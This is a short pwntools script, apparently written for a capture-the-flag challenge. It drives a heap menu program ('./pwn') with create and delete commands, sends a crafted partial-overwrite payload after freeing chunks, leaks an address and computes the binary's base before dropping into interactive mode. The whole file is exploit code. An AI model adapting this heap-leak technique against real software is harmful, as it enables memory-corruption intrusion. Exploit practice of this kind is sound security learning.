from pwn import *

p=process('./pwn')
elf=ELF('pwn')

def create(size,content):
    p.send("create ")
    p.recvuntil("size:")
    p.sendline(str(size))
    p.recvuntil('str:')
    p.send(content)
    p.recvuntil('quit')

def delete(idx):
	p.send('delete ')
	p.recvuntil('id:')
	p.sendline(str(idx))
	p.recvuntil('sure?:')
	p.sendline('yes')
	#p.recvuntil('quit')
	
create(4,"AAAA")
create(4,"BBBB")

delete(0)
delete(1)
#delete(0)

#create(4,"CCCC")
create(0x20, 'a' * 0x16 + 'lo' + '\x0B')
delete(0)
print "xxxxxxxx"
p.recvuntil('lo')
addr = p.recvline()
addr = addr[:-1]
addr = u64(addr + '\x00' * (8 - len(addr))) - 0xD0B

print hex(addr)
p.interactive()
